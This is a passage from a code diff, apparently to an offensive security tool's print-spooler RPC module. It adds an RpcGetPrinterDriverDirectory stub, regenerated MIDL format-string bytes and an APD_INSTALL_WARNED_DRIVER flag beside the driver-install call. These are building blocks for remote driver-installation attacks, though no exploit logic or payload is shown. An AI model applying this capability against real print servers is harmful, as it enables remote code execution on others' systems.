0x00, 0x08, 0x00, 0x46, 0x04, 0x0a, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x78, 0x02, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00, + 0x08, 0x00, 0x50, 0x21, 0x28, 0x00, 0x08, 0x00, 0x50, 0x21, 0x30, 0x00, 0x08, 0x00, 0x70, 0x00, 0x38, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x38, 0x00, 0x31, 0x08, + 0x00, 0x00, 0x00, 0x5c, 0x10, 0x00, 0x24, 0x00, 0x47, 0x07, 0x0a, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, + 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x1b, 0x00, 0x18, 0x00, 0x2e, 0x00, 0x48, 0x00, 0x20, 0x00, 0x08, 0x00, 0x50, 0x21, 0x28, 0x00, 0x08, 0x00, 0x70, 0x00, 0x30, 0x00, 0x08, 0x00, 0x00, 0x48, + 0x00, 0x00, 0x00, 0x00, 0x1d, 0x00, 0x10, 0x00, 0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x40, 0x00, 0x44, 0x02, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, + 0x00, 0x00, 0x46, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x10, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x44, 0x02, + 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x00, 0x40, 0x00, + 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x44, 0x00, 0x08, 0x00, 0x47, 0x08, 0x0a, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x48, 0x00, 0x08, 0x00, + 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x0b, 0x00, 0x18, 0x00, 0x02, 0x00, 0x48, 0x00, 0x20, 0x00, 0x08, 0x00, 0x88, 0x00, 0x28, 0x00, 0x4e, 0x00, 0x1b, 0x00, 0x30, 0x00, 0x58, 0x00, + 0x70, 0x00, 0x38, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x30, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x10, 0x00, 0x08, 0x00, 0x46, 0x06, 0x0a, 0x01, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x6a, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x6a, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x48, 0x00, + 0x20, 0x00, 0x08, 0x00, 0x70, 0x00, 0x28, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x59, 0x00, 0x20, 0x00, 0x31, 0x08, 0x00, 0x00, 0x00, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x46, 0x04, + 0x0a, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x78, 0x02, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, + 0x08, 0x00, 0x00, }}; static const ms2Drprn_MIDL_TYPE_FORMAT_STRING ms2Drprn__MIDL_TypeFormatString = {0, { 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x00, 0x0e, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, @@ -106,42 +113,48 @@ DWORD RpcEnumPrinterDrivers(STRING_HANDLE pName, wchar_t *pEnvironment, DWORD Le { return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[66], (unsigned char *) &pName).Simple; } +DWORD RpcGetPrinterDriverDirectory(STRING_HANDLE pName, wchar_t *pEnvironment, DWORD Level, BYTE *pDriverDirectory, DWORD cbBuf, DWORD *pcbNeeded) +{ + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[144], (unsigned char *) &pName).Simple; +} DWORD RpcClosePrinter(PRINTER_HANDLE *phPrinter) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[144], (unsigned char *) &phPrinter).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[216], (unsigned char *) &phPrinter).Simple; } DWORD RpcFindClosePrinterChangeNotification(PRINTER_HANDLE hPrinter) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[186], (unsigned char *) &hPrinter).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[258], (unsigned char *) &hPrinter).Simple; } DWORD RpcRemoteFindFirstPrinterChangeNotification(PRINTER_HANDLE hPrinter, DWORD fdwFlags, DWORD fdwOptions, wchar_t *pszLocalMachine, DWORD dwPrinterLocal, DWORD cbBuffer, BYTE *pBuffer) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[228], (unsigned char *) &hPrinter).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[300], (unsigned char *) &hPrinter).Simple; } DWORD RpcDeletePrinterDriverEx(STRING_HANDLE pName, wchar_t *pEnvironment, wchar_t *pDriverName, DWORD dwDeleteFlag, DWORD dwVersionNum) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[306], (unsigned char *) &pName).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[376], (unsigned char *) &pName).Simple; } DWORD RpcAddPrinterDriverEx(STRING_HANDLE pName, DRIVER_CONTAINER *pDriverContainer, DWORD dwFileCopyFlags) { - return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[372], (unsigned char *) &pName).Simple; + return (DWORD) NdrClientCall2((PMIDL_STUB_DESC) &winspool_StubDesc, (PFORMAT_STRING) &ms2Drprn__MIDL_ProcFormatString.Format[444], (unsigned char *) &pName).Simple; } #pragma optimize("", on) static const ms2Drprn_MIDL_PROC_FORMAT_STRING ms2Drprn__MIDL_ProcFormatString = {0, { - 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x08, 0x00, 0x40, 0x00, 0x46, 0x06, 0x08, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, - 0x00, 0x00, 0x02, 0x00, 0x10, 0x01, 0x04, 0x00, 0x0a, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x0c, 0x00, 0x1e, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x14, 0x00, - 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x20, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x10, 0x00, 0x40, 0x00, 0x47, 0x08, 0x08, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x04, 0x00, 0x02, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x1b, 0x00, 0x0c, 0x00, 0x32, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x50, 0x21, - 0x14, 0x00, 0x08, 0x00, 0x50, 0x21, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x1c, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, - 0x38, 0x00, 0x40, 0x00, 0x44, 0x02, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x4a, 0x00, 0x70, 0x00, 0x04, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, - 0x38, 0x00, 0x08, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x44, 0x02, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x70, 0x00, - 0x04, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x00, 0x20, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x44, 0x00, 0x08, 0x00, 0x47, 0x08, 0x08, 0x07, 0x01, 0x00, 0x01, 0x00, - 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x48, 0x00, 0x04, 0x00, 0x08, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x0b, 0x00, 0x0c, 0x00, 0x02, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, - 0x88, 0x00, 0x14, 0x00, 0x52, 0x00, 0x1b, 0x00, 0x18, 0x00, 0x5c, 0x00, 0x70, 0x00, 0x1c, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x18, 0x00, 0x31, 0x04, 0x00, 0x00, - 0x00, 0x5c, 0x10, 0x00, 0x08, 0x00, 0x46, 0x06, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x6e, 0x00, 0x0b, 0x01, 0x08, 0x00, - 0x6e, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x14, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x59, 0x00, 0x10, 0x00, 0x31, 0x04, - 0x00, 0x00, 0x00, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x46, 0x04, 0x08, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x04, 0x00, 0xca, 0x03, 0x48, 0x00, - 0x08, 0x00, 0x08, 0x00, 0x70, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x00, + 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x08, 0x00, 0x40, 0x00, 0x46, 0x06, 0x08, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, + 0x00, 0x00, 0x02, 0x00, 0x10, 0x01, 0x04, 0x00, 0x0a, 0x00, 0x0b, 0x00, 0x08, 0x00, 0x02, 0x00, 0x0b, 0x01, 0x0c, 0x00, 0x1e, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x14, 0x00, + 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x20, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x10, 0x00, 0x40, 0x00, 0x47, 0x08, 0x08, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x04, 0x00, 0x02, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x1b, 0x00, 0x0c, 0x00, 0x32, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x50, 0x21, + 0x14, 0x00, 0x08, 0x00, 0x50, 0x21, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x1c, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x1c, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, + 0x10, 0x00, 0x24, 0x00, 0x47, 0x07, 0x08, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x04, 0x00, 0x02, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, + 0x1b, 0x00, 0x0c, 0x00, 0x32, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x50, 0x21, 0x14, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x1d, 0x00, + 0x08, 0x00, 0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x40, 0x00, 0x44, 0x02, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x4a, 0x00, 0x70, 0x00, 0x04, 0x00, + 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x08, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x44, 0x02, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x08, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x70, 0x00, 0x04, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x00, 0x20, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x44, 0x00, 0x08, 0x00, + 0x47, 0x08, 0x08, 0x07, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x48, 0x00, 0x04, 0x00, 0x08, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x0b, 0x00, 0x0c, 0x00, + 0x02, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x88, 0x00, 0x14, 0x00, 0x52, 0x00, 0x1b, 0x00, 0x18, 0x00, 0x5c, 0x00, 0x70, 0x00, 0x1c, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, + 0x54, 0x00, 0x18, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x10, 0x00, 0x08, 0x00, 0x46, 0x06, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0b, 0x01, + 0x04, 0x00, 0x6e, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x6e, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x14, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, + 0x00, 0x00, 0x59, 0x00, 0x10, 0x00, 0x31, 0x04, 0x00, 0x00, 0x00, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x46, 0x04, 0x08, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x02, 0x00, + 0x0b, 0x01, 0x04, 0x00, 0xca, 0x03, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x70, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x00, }}; static const ms2Drprn_MIDL_TYPE_FORMAT_STRING ms2Drprn__MIDL_TypeFormatString = {0, { 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x00, 0x0e, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, diff --git a/modules/rpc/kull_m_rpc_ms-rprn.h b/modules/rpc/kull_m_rpc_ms-rprn.h index 80583ae6..509703e0 100644 --- a/modules/rpc/kull_m_rpc_ms-rprn.h +++ b/modules/rpc/kull_m_rpc_ms-rprn.h @@ -5,6 +5,7 @@ #define PRINTER_CHANGE_ALL 0x7777FFFF */ #define PRINTER_NOTIFY_CATEGORY_ALL 0x00010000 +#define APD_INSTALL_WARNED_DRIVER 0x00008000 typedef void *PRINTER_HANDLE; @@ -122,6 +123,7 @@ typedef struct _DRIVER_CONTAINER { DWORD RpcOpenPrinter(STRING_HANDLE pPrinterName, PRINTER_HANDLE *pHandle,wchar_t *pDatatype, DEVMODE_CONTAINER *pDevModeContainer, DWORD AccessRequired); DWORD RpcEnumPrinterDrivers(STRING_HANDLE pName,wchar_t *pEnvironment, DWORD Level, BYTE *pDrivers, DWORD cbBuf, DWORD *pcbNeeded, DWORD *pcReturned); +DWORD RpcGetPrinterDriverDirectory(STRING_HANDLE pName, wchar_t *pEnvironment, DWORD Level, BYTE *pDriverDirectory, DWORD cbBuf, DWORD *pcbNeeded); DWORD RpcClosePrinter(PRINTER_HANDLE *phPrinter); DWORD RpcFindClosePrinterChangeNotification(PRINTER_HANDLE hPrinter); DWORD RpcRemoteFindFirstPrinterChangeNotification(PRINTER_HANDLE hPrinter, DWORD fdwFlags, DWORD fdwOptions, wchar_t *pszLocalMachine, DWORD dwPrinterLocal, DWORD cbBuffer, BYTE *pBuffer);